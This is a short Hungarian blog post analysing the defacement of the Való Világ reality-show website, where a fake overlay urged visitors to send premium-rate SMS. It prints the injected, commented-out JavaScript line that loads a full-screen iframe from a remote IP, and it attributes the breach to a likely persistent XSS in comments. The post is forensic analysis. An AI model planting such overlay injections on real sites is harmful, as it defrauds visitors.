Nem gondoltam, hogy valaha meg fogok emlékezni a Való Világról ezen blog hasábjain, de úgy tűnik, hogy hosszú idő után ezt a szerveződést érte az a "megtiszteltetés", hogy automatizált botok helyett céltudatosabb támadók deface-eljék a weboldalát. 

Ahogy az a comment:com posztjából kiderül, a támadók egy kamu ablakot szerkesztettek, melyben emelt díjas SMS küldésre próbálták rávenni a látogatókat. A felületelem egy külföldi hoszting szolgáltatónál elhelyezett Javascripttel töltődött be, ami szerencsére még mindig elérhető (bár az egyetlen utasítást kikommentezték):

$ cat i.js
//document.write("<iframe id=\"vvonline\" style=\"border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%\" src=\"http:\/\/23.92.60.124\/online.php\"> <\/iframe>");

Az online.php tartalmazza magát a megjelenő HTML kódot, az általam sebtiben le-wgetelt változatban nincs malware, ami arra utal, hogy nem profi malware-gazdákkal van dolgunk, mivel feltehetően nem volt kész botnet infrastruktúra, amibe be tudták volna húzni a valóságshow iránt érdeklődőket. A betöltődő oldal az "élőkép" helyére egy sima JPG-t rak, amiből egy gyors strings után megkaphatjuk a kép készítéséhez használt szoftver nevét, illetve a létrehozás idejét:

PhotoFiltre Studio X
2014:01:19 19:20:24

Nálam ügyesebb forensic expertek számára learchiváltam a fájlokat.

Machiavellinek a screenshot alapján valószínűleg igaza van abban, hogy a problémát egy kommentben triggerelhető perzisztens XSS okozta.